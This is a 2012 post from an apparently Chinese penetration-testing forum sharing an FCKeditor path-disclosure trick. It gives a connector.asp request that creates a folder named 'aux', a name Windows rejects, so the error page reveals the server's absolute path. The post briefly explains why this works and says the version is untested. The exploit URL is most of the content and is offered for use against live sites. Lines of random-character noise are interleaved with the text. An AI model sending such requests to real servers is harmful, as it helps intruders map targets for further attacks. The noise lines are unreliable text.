中国网络渗透测试联盟
标题:
最新FCKeditor爆绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:39
标题:
最新FCKeditor爆绝对路径漏洞
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
& u; M X& ^3 r- e* m
( G4 B% }9 j1 X s
4 K. m$ }( u* T+ }
版本未测试。。。
0 U$ ~0 U# u, a& ^
' Q% K f' J# M; n# h1 S6 v
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
3 r5 e6 K* x: I7 r; g0 a3 y
6 V5 h: i; f4 Y
$ P- Q U5 p1 D3 C: y
听说IIS都可以。。
& ~6 y! p* j. ^* y1 p
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2